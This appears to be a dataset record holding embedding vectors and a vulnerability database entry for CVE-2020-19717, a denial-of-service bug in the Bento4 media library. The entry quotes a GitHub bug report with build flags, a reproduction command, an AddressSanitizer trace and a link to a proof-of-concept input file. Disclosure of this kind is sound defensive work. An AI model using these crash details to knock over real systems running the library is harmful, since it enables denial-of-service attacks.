0.00574336526915431, 0.015429714694619179, 0.0116057638078928, 0.0016236910596489906, 0.008458816446363926, 0.02007202059030533, 0.013309430330991745, 0.01606951840221882, -0.008295145817101002, -0.002309993375092745, 0.014566721394658089, 0.017036667093634605, -0.011047794483602047, -0.010601419024169445, -0.009158138185739517, -0.008600168861448765, -0.006650995463132858, -0.0019677721429616213, 0.004482354503124952, -0.02292882278561592, -0.0017371447756886482, -0.026767652481794357, 0.019625645130872726, 0.015846330672502518, 0.006710512097924948, -0.00693741999566555, -0.00015320909733418375, 0.0008899612003006041, 0.011159388348460197, 0.001999390311539173, -0.02370254136621952, -0.014261698350310326, -0.021440904587507248, -0.010690693743526936, 0.0027061516884714365, -0.001697156927548349, -0.002914460375905037, -0.00862248707562685, 0.01467087585479021, -0.01742352545261383, -0.0014404910616576672, -0.021559938788414, 0.038507331162691116, 0.012870494276285172, -0.0049324496649205685, 0.0018524584593251348, 0.01720033772289753, -0.023003218695521355, 0.002678253222256899, -0.005739645566791296, 0.021440904587507248, 0.014164983294904232, 0.003691897727549076, -0.0030297739431262016, 0.017944296821951866, 0.008518333546817303, -0.020920133218169212, 0.01770623028278351, -0.027972867712378502, 0.011174267157912254, 0.006316213868558407, 0.00985002052038908, -0.012453877367079258, 0.01642661914229393, -0.009931855835020542, 0.015980243682861328, 0.024416740983724594, 0.0011903347913175821, 0.009269732050597668, -0.0037997716572135687, -0.0038871869910508394, -0.006766309030354023, -0.0016952970763668418, 0.021009407937526703, -0.006863024085760117, 0.019461972638964653, -0.008585289120674133, 0.00039220601320266724, -0.004965927917510271, -0.005393704399466515, -0.006591478828340769, 0.014112906530499458, 0.007766934111714363, 0.01362933311611414, -0.008124034851789474, 0.0069820573553442955, 0.009299490600824356, 0.0023750897962599993, -0.020711824297904968, -0.02184264361858368, -0.004567909520119429, -0.010474946349859238, 0.025696352124214172, -0.006130224093794823, 0.007856209762394428, -0.04410190135240555, -0.004203369840979576, -0.011070113629102707, 0.0076255821622908115, -0.0049212900921702385, -0.007495389319956303, 0.018450189381837845, 0.023776937276124954, 0.012595229782164097, -0.008570410311222076, 0.003135788021609187, 0.012699384242296219, 0.012915132567286491, -0.009820261970162392, -0.015429714694619179, -0.015139570459723473, 0.013577255420386791, -0.008540651760995388, 0.002678253222256899, 0.004727860912680626, 0.0022839547600597143, -0.0023006938863545656, -0.003453830722719431, 0.0021128442604094744, 0.006290175020694733, 0.0012628707336261868, 0.004712981637567282, 0.0020589071791619062, 0.005337907467037439, 0.0009438982815481722, 0.008659685030579567, -0.012520833872258663, -0.01682835817337036, -0.005520177539438009, 0.008912631310522556, -0.005668969359248877, 0.031157013028860092, 0.008741521276533604, -0.011687599122524261, 0.020042261108756065, 0.00001871522363217082, 0.01098827738314867, -0.0066137975081801414, 0.02334544062614441, 0.004500953480601311, 0.02261636033654213, 0.02234853431582451, 0.0035338064190000296, 0.009567315690219402, 0.010259198024868965, 0.01760207489132881, 0.008659685030579567, 0.002903300803154707, 0.006591478828340769, -0.018405551090836525, -0.0006542191258631647, -0.006855584215372801, 0.02197655476629734, -0.0022076989989727736, -0.0028010064270347357, 0.00610790541395545, -0.003773733275011182, 0.0013307570479810238, 0.044161420315504074, -0.017408646643161774, 0.00969378836452961, -0.007841330021619797, -0.004694382660090923, -0.012840736657381058, -0.012699384242296219, 0.02498215064406395, 0.005211434327065945, -0.001074091182090342, -0.0066137975081801414, -0.0035710043739527464, 0.005970272701233625, 0.00973842665553093, -0.002311853226274252, -0.00296281767077744, 0.023762058466672897, 0.0016329905483871698, -0.00973842665553093, -0.01146441139280796, 0.004995686002075672, -0.018807290121912956, 0.008957268670201302, 0.00454931054264307, 0.0009155347943305969, -0.011806633323431015, -0.008964709006249905, 0.0015864931046962738, -0.022512206807732582, 0.01399387326091528, -0.001993810757994652, -0.010363351553678513, -0.004199649672955275, -0.006152542773634195, 0.013049044646322727, -0.015459472313523293, -0.014150104485452175, 0.00014344463124871254, -0.010251757688820362, 0.008451377041637897, -0.011568565852940083, -0.007089931517839432, -0.018866805359721184, -0.0013409864623099566, 0.012877934612333775, 0.0201166570186615, -0.019640523940324783, 0.012744021601974964, -0.017825262621045113, 0.005189115647226572, -0.016441497951745987, 0.023226406425237656, -0.00526723125949502, -0.00218352023512125, -0.006398049183189869, -0.00909862108528614, -0.03062136098742485, 0.0023341721389442682, 0.02865730971097946, 0.005133318714797497, 0.02794310823082924, 0.016843236982822418, -0.004151292610913515, 0.008570410311222076, 0.009931855835020542, 0.00003777918027481064, -0.021946797147393227, -0.014365852810442448, 0.007670219521969557, -0.00474274018779397, 0.0011280281469225883, -0.014380731619894505, -0.005423462949693203, -0.014038510620594025, -0.00273033045232296, 0.003275280585512519, -0.004746459890156984, 0.004214528948068619, 0.0017111061606556177, -0.0016274107620120049, 0.0027545089833438396, 0.00454931054264307, 0.019417336210608482, 0.02007202059030533, 0.014908943325281143, 0.0021983995102345943, -0.014760150574147701, 0.013391265645623207, 0.0013512159930542111, 0.004753899294883013, -0.004939889069646597, -0.01742352545261383, -0.02580050565302372, -0.013049044646322727, 0.0028084460645914078, 0.006889062467962503, -0.00045637247967533767, 0.0118289515376091, -0.002918180078268051, -0.02074158377945423, 0.019328061491250992, 0.025175580754876137, 0.01583145186305046, 0.010794848203659058, -0.01901559717953205, -0.0020198493730276823, -0.004753899294883013, -0.017899658530950546, 0.02484823763370514, -0.02394060790538788, -0.0018264198442921042, -0.014827107079327106, -0.022036071866750717, -0.000003875998572766548, 0.0040136598981916904, -0.012290206737816334, -0.005520177539438009, -0.038923945277929306, -0.017036667093634605, 0.022854426875710487, 0.01197030395269394, 0.009864899329841137, 0.010102965869009495, -0.018598981201648712, 0.007123409770429134, -0.012974648736417294, 0.025264855474233627, 0.008406739681959152, 0.01609927788376808, -0.024773841723799706, -0.009991372004151344, 0.0122158108279109, -0.006372010800987482, -0.014164983294904232, 0.0539519228041172, 0.005966552998870611, 0.020994529128074646, 0.004794817417860031, 0.0014432809548452497, 0.013421024195849895, 0.004035978578031063, -0.017259854823350906, -0.0016283408040180802, -0.002417867537587881, -0.015623143874108791, -0.009411084465682507, 0.017959175631403923, -0.008964709006249905, 0.001665538758970797, 0.006256697233766317, -0.005546215921640396, 0.004359601065516472, -0.002832624828442931, -0.013904597610235214, -0.01910487376153469, 0.007781813386827707, 0.021723609417676926, -0.03145459666848183, -0.006881623063236475, 0.00853321235626936, 0.006781188305467367, -0.013599574565887451, -0.004274045582860708, -0.01861386001110077, 0.018896564841270447, -0.021902158856391907, -0.005992591381072998, 0.021173080429434776, 0.004430277273058891, 0.024148916825652122, 0.008354661986231804, 0.015072613954544067, 0.0016525194514542818, -0.001776202698238194, -0.02639567293226719, 0.012624988332390785, -0.006598918233066797, 0.0007579084485769272, 0.004088055808097124, 0.0032213435042649508, 0.010541901923716068, 0.003939263988286257, 0.019461972638964653, 0.015385076403617859, 0.009158138185739517, 0.008183551020920277, -0.020086899399757385, 0.0052597918547689915, -0.004288924857974052, -0.007662780117243528, -0.0006983916973695159, 0.00023457963834516704, 0.007104810792952776, -0.014112906530499458, -0.009359006769955158, -0.009530117735266685, -0.00839185994118452, 0.004181050695478916, -0.03002619370818138, -0.013525178655982018, 0.006438967306166887, 0.01587609015405178, -0.022259259596467018, 0.006186021026223898, 0.0007076911861076951, 0.01629270613193512, -0.00015111672109924257, -0.000543090223800391, -0.030145227909088135, -0.020771341398358345, 0.025532681494951248, -0.0027972867246717215, 0.015593385323882103, 0.008562970906496048, -0.018643617630004883, -0.013696289621293545, 0.021455783396959305, 0.0038946266286075115, -0.015094933100044727, -0.007752055302262306, -0.01837579347193241, -0.005092401057481766, -0.004121534060686827, 0.008376981131732464, 0.009946734644472599, -0.004545590840280056, -0.0170217864215374, 0.0041289739310741425, 0.024089399725198746, -0.016887875273823738, -0.008585289120674133, -0.01983395218849182, 0.003556125098839402, 0.018316276371479034, 0.008354661986231804, 0.02938639000058174, -0.015325560234487057, -0.005062642507255077, 0.015801694244146347, -0.026767652481794357, -0.010541901923716068, -0.013584695756435394, -0.01328711211681366, 0.008481135591864586, 0.014098027721047401, -0.009969053789973259, -0.014284017495810986, -0.0011224484769627452, -0.0004335887497290969, 0.0005137968109920621, -0.0002840994275175035, -0.010296395979821682, -0.006040948908776045, -0.007123409770429134, -0.00960451364517212, -0.010817167349159718, 0.029059046879410744, 0.019119752570986748, 0.0037402550224214792, -0.010199680924415588, -0.000954127695877105, 0.017795505002141, 0.004969647619873285, 0.016322465613484383, -0.010660936124622822, -0.022318776696920395, 0.03190097212791443, 0.01910487376153469, 0.010095526464283466, 0.00923997350037098, -0.014745271764695644, 0.0038834670558571815, 0.02597905695438385, -0.0024067081976681948, -0.0201166570186615, 0.052434246987104416, -0.0024327465798705816, -0.011479291133582592, -0.003924384713172913, 0.01974467746913433, -0.0088977525010705, 0.001068511395715177, -0.007997561246156693, -0.014938700944185257, -0.006368291098624468, 0.004623706452548504, 0.020458878949284554, 0.007960363291203976, -0.004512112587690353, -0.014150104485452175, 0.040649931877851486, 0.008012440986931324, -0.015139570459723473, 0.01185127068310976, -0.0026652340311557055, -0.01019224151968956, -0.0055759744718670845, 0.014112906530499458, 0.0012675204779952765, 0.0011122190626338124, 0.00024713395396247506, -0.005668969359248877, 0.010601419024169445, -0.0019287143368273973, -0.028225813060998917, -0.006089306436479092, 0.017572317272424698, -0.019938107579946518, -0.00011357002222212031, 0.016902754083275795, 0.009143258444964886, 0.00982770137488842, 0.01810796745121479, 0.0023378918413072824, 0.017230095341801643, -0.011747116222977638, -0.01481222826987505, 0.011985182762145996, 0.022780030965805054, 0.00033617657027207315, -0.0167985986918211, -0.019119752570986748, 0.002827045042067766, 0.0033013189677149057, 0.007540026679635048, -0.03306154906749725, 0.010036010295152664, 0.007863649167120457, -0.01847994700074196, 0.0244316216558218, 0.019908348098397255, 0.01362933311611414, 0.015667781233787537, -0.0017176158726215363, 0.006770028732717037, -0.010504703968763351, -0.009150698781013489, 0.015489230863749981 ]
160
CVE-2020-19717
2021-07-13T22:15:08.943000
An unhandled memory allocation failure in Core/Ap48bdlAtom.cpp of Bento 1.5.1-628 causes a NULL pointer dereference, leading to a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/416" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/416
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
There is a null pointer dereference caused by unhandled exhaustive memory usage in Ap48bdlAtom.cpp. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS=-g -m32 -fsanitize=address,undefined then run: ./mp42aac input /dev/null The reason is that the malloc size does not check and easily lead to memory allocation failure. ![image](https://user-images.githubusercontent.com/7632714/62784397-f5302000-baf0-11e9-8876-4dc122aa9d11.png) ![image](https://user-images.githubusercontent.com/7632714/62784507-388a8e80-baf1-11e9-8a23-5b066cdbaedd.png) Here is the trace reported by ASAN: ==131030==WARNING: AddressSanitizer failed to allocate 0xffe1fff1 bytes ==131030==AddressSanitizer's allocator is terminating the process instead of returning 0 ==131030==If you don't like this behavior set allocator_may_return_null=1 ==131030==AddressSanitizer CHECK failed: ../../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0xf71fe797 (/usr/lib32/libasan.so.2+0x9f797) #1 0xf7203a69 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib32/libasan.so.2+0xa4a69) #2 0xf717507b (/usr/lib32/libasan.so.2+0x1607b) #3 0xf7201e80 (/usr/lib32/libasan.so.2+0xa2e80) #4 0xf717a229 (/usr/lib32/libasan.so.2+0x1b229) #5 0xf71f6e16 in operator new[](unsigned int) (/usr/lib32/libasan.so.2+0x97e16) #6 0x877ebaf in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4DataBuffer.cpp:55 #7 0x8ba5673 in AP4_8bdlAtom::AP4_8bdlAtom(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap48bdlAtom.cpp:76 #8 0x8ba5673 in AP4_8bdlAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap48bdlAtom.cpp:64 #9 0x82e10dc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:534 #10 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #11 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #12 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #13 0x841a898 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.cpp:80 #14 0x82e2631 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.h:56 #15 0x82e2631 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:363 #16 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #17 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #18 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #19 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #20 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #21 0xf697f636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #22 0x808df1b (/mnt/data/playground/mp42-patch/Build/mp42aac+0x808df1b) The poc input: [poc_input6.zip](https://github.com/axiomatic-systems/Bento4/files/3486674/poc_input6.zip)
Null pointer dereference caused by unhandled exhaustive memory usage
https://api.github.com/repos/axiomatic-systems/Bento4/issues/416/comments
0
2019-08-09T14:02:54
2019-08-25T16:22:18Z
https://github.com/axiomatic-systems/Bento4/issues/416
479,003,776
416
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Null pointer dereference caused by unhandled exhaustive memory usage Issue date: --- start body --- There is a null pointer dereference caused by unhandled exhaustive memory usage in Ap48bdlAtom.cpp. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS=-g -m32 -fsanitize=address,undefined then run: ./mp42aac input /dev/null The reason is that the malloc size does not check and easily lead to memory allocation failure. ![image](https://user-images.githubusercontent.com/7632714/62784397-f5302000-baf0-11e9-8876-4dc122aa9d11.png) ![image](https://user-images.githubusercontent.com/7632714/62784507-388a8e80-baf1-11e9-8a23-5b066cdbaedd.png) Here is the trace reported by ASAN: ==131030==WARNING: AddressSanitizer failed to allocate 0xffe1fff1 bytes ==131030==AddressSanitizer's allocator is terminating the process instead of returning 0 ==131030==If you don't like this behavior set allocator_may_return_null=1 ==131030==AddressSanitizer CHECK failed: ../../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0xf71fe797 (/usr/lib32/libasan.so.2+0x9f797) #1 0xf7203a69 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib32/libasan.so.2+0xa4a69) #2 0xf717507b (/usr/lib32/libasan.so.2+0x1607b) #3 0xf7201e80 (/usr/lib32/libasan.so.2+0xa2e80) #4 0xf717a229 (/usr/lib32/libasan.so.2+0x1b229) #5 0xf71f6e16 in operator new[](unsigned int) (/usr/lib32/libasan.so.2+0x97e16) #6 0x877ebaf in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4DataBuffer.cpp:55 #7 0x8ba5673 in AP4_8bdlAtom::AP4_8bdlAtom(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap48bdlAtom.cpp:76 #8 0x8ba5673 in AP4_8bdlAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap48bdlAtom.cpp:64 #9 0x82e10dc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:534 #10 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #11 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #12 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #13 0x841a898 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.cpp:80 #14 0x82e2631 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.h:56 #15 0x82e2631 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:363 #16 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #17 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #18 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #19 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #20 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #21 0xf697f636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #22 0x808df1b (/mnt/data/playground/mp42-patch/Build/mp42aac+0x808df1b) The poc input: [poc_input6.zip](https://github.com/axiomatic-systems/Bento4/files/3486674/poc_input6.zip) --- end body ---
4,393
[ -0.026603126898407936, 0.015587530098855495, -0.007486923597753048, -0.004940142389386892, 0.018579231575131416, -0.01123038586229086, -0.0626569613814354, 0.0400734506547451, -0.020435620099306107, 0.024685369804501534, -0.02746228128671646, 0.002406785264611244, 0.016630789265036583, 0.023166505619883537, 0.019085519015789032, -0.0046409722417593, -0.024056345224380493, 0.00112092902418226, -0.016308605670928955, -0.007057345937937498, 0.034949205815792084, -0.036452725529670715, -0.0032007365953177214, 0.03016248345375061, -0.004675491712987423, 0.012810617685317993, -0.024501264095306396, -0.0038642806466668844, 0.009696180000901222, 0.002372265560552478, 0.012235290370881557, 0.0023971963673830032, -0.021908456459641457, 0.013109787367284298, 0.04209860414266586, 0.003248680615797639, 0.04915595054626465, 0.0381096675992012, 0.02743159793317318, 0.01653873734176159, 0.006792695727199316, -0.05409609153866768, -0.048572953790426254, 0.010601361282169819, -0.01198214665055275, 0.008046909235417843, 0.010532322339713573, 0.0006827215547673404, -0.052040256559848785, 0.014421533793210983, 0.02582068182528019, -0.013477996923029423, -0.026649152860045433, -0.07953321933746338, 0.02104930207133293, -0.019315648823976517, 0.0183184165507555, 0.03629930689930916, 0.006708314176648855, 0.02368813566863537, 0.004245914053171873, 0.017489945515990257, 0.013999626971781254, 0.027968568727374077, 0.009657824411988258, 0.029963036999106407, -0.014053324237465858, 0.008146632462739944, -0.020297540351748466, 0.024056345224380493, -0.024961525574326515, -0.0323103703558445, -0.0029859477654099464, 0.04703874513506889, 0.01621655374765396, -0.031758058816194534, 0.019637832418084145, 0.03764940798282623, -0.02970222197473049, 0.027753781527280807, -0.030745482072234154, 0.02266021817922592, -0.039920032024383545, 0.00959645677357912, 0.015648897737264633, 0.023488689213991165, -0.02109532803297043, -0.06449800729751587, -0.016523394733667374, -0.032249003648757935, 0.004579604137688875, 0.011690647341310978, 0.019852621480822563, 0.018548546358942986, 0.004917129408568144, 0.0327092669904232, -0.036176569759845734, -0.03138984739780426, -0.0596192330121994, -0.008982773870229721, -0.0356549397110939, -0.028643619269132614, 0.002178572118282318, 0.041392870247364044, 0.0057264226488769054, 0.008990445174276829, 0.015894370153546333, -0.028474858030676842, 0.02424044907093048, 0.13378272950649261, 0.007080359384417534, -0.021033959463238716, -0.025375762954354286, -0.028781699016690254, 0.010800807736814022, 0.0022188450675457716, 0.012680210173130035, -0.01744391955435276, -0.04329528287053108, -0.04108602926135063, -0.03976660966873169, -0.02172435261309147, -0.023243216797709465, 0.007571305148303509, -0.027554333209991455, 0.032218318432569504, 0.012058856897056103, -0.014881795272231102, -0.020865198224782944, -0.01670750044286251, -0.02648038975894451, -0.025621235370635986, 0.0027059551794081926, -0.020466303452849388, -0.017505286261439323, -0.01175201591104269, -0.01807294227182865, 0.03562425449490547, 0.006125316023826599, -0.011621608398854733, -0.0727827176451683, -0.017474602907896042, 0.03243310749530792, -0.016845578327775, -0.03261721134185791, -0.0037051066756248474, -0.023918267339468002, 0.022921033203601837, -0.025667261332273483, -0.013270879164338112, -0.0188093613833189, -0.019116202369332314, 0.02974824793636799, 0.0054579367861151695, 0.03019316866993904, -0.0021824075374752283, 0.00353442644700408, 0.028858408331871033, -0.02312047965824604, 0.012288987636566162, 0.0036437385715544224, -0.020466303452849388, 0.015625884756445885, -0.037956248968839645, -0.013930588029325008, -0.02115669660270214, 0.01594039797782898, 0.009105511009693146, -0.02091122418642044, 0.02655710093677044, -0.01049396675080061, 0.016615446656942368, -0.0163546334952116, 0.010202467441558838, -0.05517003685235977, -0.007494594901800156, -0.003551686182618141, 0.04716148227453232, -0.004905622452497482, -0.01199748832732439, -0.00186789536383003, 0.013094445690512657, 0.03359910473227501, 0.010401914827525616, 0.020604383200407028, -0.0362379364669323, 0.03160463646054268, -0.04667053744196892, 0.029195934534072876, 0.005419581662863493, 0.005523140542209148, 0.0005206710775382817, -0.004947813227772713, -0.005668890196830034, 0.036483410745859146, -0.0140686659142375, -0.03703572601079941, -0.006017921958118677, -0.017597340047359467, 0.002884306712076068, 0.007149398326873779, -0.025882050395011902, -0.026020128279924393, 0.019423043355345726, -0.03178874030709267, 0.012756920419633389, -0.01597108133137226, 0.05974197015166283, 0.0351639948785305, -0.0075252787210047245, -0.007947185076773167, -0.018517863005399704, 0.005968060344457626, -0.015925055369734764, -0.011521884240210056, 0.009673167020082474, -0.04519769921898842, 0.005511634051799774, -0.009212905541062355, -0.010325204581022263, 0.03286268562078476, 0.0012359945103526115, 0.03157395124435425, -0.01262651290744543, -0.005918198265135288, -0.011920778080821037, 0.001227364526130259, -0.006037099286913872, -0.003824007697403431, 0.005626699421554804, 0.027247492223978043, 0.01566424034535885, -0.01825704798102379, -0.004663985222578049, 0.03654478117823601, 0.013968942686915398, 0.007916501723229885, -0.015250004827976227, 0.0103865722194314, 0.021586274728178978, -0.00940468069165945, 0.04025755822658539, -0.022890347987413406, -0.03289337083697319, 0.018655940890312195, 0.05876007676124573, -0.025068920105695724, -0.013623746111989021, 0.004499058239161968, -0.0024029496125876904, 0.020128779113292694, -0.02483879029750824, 0.007682534866034985, 0.0034308675676584244, -0.0016099570784717798, 0.004372486378997564, 0.04848089814186096, 0.003016631817445159, -0.014268113300204277, -0.025743970647454262, 0.026771889999508858, -0.009895626455545425, -0.012833630666136742, -0.0014718786114826798, -0.013547035865485668, -0.008798670023679733, -0.033507052809000015, -0.0025678768288344145, -0.01653873734176159, -0.008691275492310524, 0.02852088399231434, -0.004690833855420351, -0.0025640411768108606, -0.04397033527493477, -0.0067543406039476395, -0.01297937985509634, 0.025697944685816765, 0.01457495428621769, -0.0037396263796836138, -0.006777353584766388, 0.009811244904994965, 0.0027021197602152824, -0.029947694391012192, 0.02964085340499878, 0.01656942069530487, 0.0112457275390625, 0.015111926011741161, -0.017919521778821945, -0.032249003648757935, -0.004238243214786053, 0.0060869609005749226, 0.008146632462739944, -0.07971733063459396, 0.01695297285914421, 0.014114691875874996, 0.023289242759346962, 0.009903297759592533, -0.0008337448816746473, -0.019668517634272575, 0.0076211667619645596, -0.01937701739370823, -0.028152674436569214, 0.004080987069755793, 0.013493338599801064, -0.02707873098552227, 0.015472464263439178, -0.0171370767056942, -0.020435620099306107, -0.0009051813394762576, -0.008560867980122566, 0.05142657458782196, -0.04544317349791527, -0.003532508620992303, -0.0313284806907177, -0.02227666601538658, -0.003898800117895007, -0.009420023299753666, -0.03106766566634178, -0.03826308995485306, 0.03341500088572502, -0.0489104762673378, 0.014060995541512966, -0.04010413587093353, 0.005105069372802973, 0.022123245522379875, -0.013316905125975609, -0.01807294227182865, 0.05237778276205063, -0.07088030129671097, 0.012603499926626682, 0.0016837907023727894, -0.021417511627078056, -0.005810804199427366, -0.036974355578422546, -0.01120737288147211, -0.0543108806014061, -0.0013654431095346808, 0.005922033917158842, 0.016201211139559746, 0.002529521705582738, -0.01919291354715824, -0.011974475346505642, 0.0026982843410223722, -0.007939514704048634, -0.013132800348103046, -0.008438130840659142, 0.0019810430239886045, -0.020374251529574394, -0.008315394632518291, 0.014682348817586899, 0.0011410654988139868, 0.011890093795955181, 0.004625630099326372, 0.002602396300062537, 0.01716776192188263, -0.018594572320580482, -0.014835769310593605, -0.008461144752800465, -0.00019357360724825412, -0.006202026270329952, 0.027354886755347252, -0.027032705023884773, 0.011583252809941769, -0.0005710122059099376, 0.012404052540659904, 0.023657452315092087, 0.014981518499553204, -0.014398520812392235, -0.006416815333068371, -0.017842812463641167, -0.00840744748711586, 0.060202229768037796, -0.023550057783722878, 0.02126409113407135, -0.006520374212414026, -0.00696145836263895, 0.030070431530475616, 0.03194216266274452, -0.04470675438642502, 0.007088030222803354, -0.0205276720225811, -0.005177943967282772, 0.014843439683318138, -0.04970826581120491, 0.02767707034945488, 0.017781443893909454, -0.025882050395011902, 0.048327479511499405, -0.023135822266340256, 0.0038566095754504204, -0.03451962769031525, 0.042374759912490845, -0.04053371399641037, -0.06247285380959511, -0.015395754016935825, 0.052745990455150604, 0.009189891628921032, -0.01352402288466692, 0.01274924911558628, -0.047100115567445755, 0.03688230365514755, 0.0016876262379810214, 0.030208509415388107, 0.010762453079223633, 0.016860920935869217, 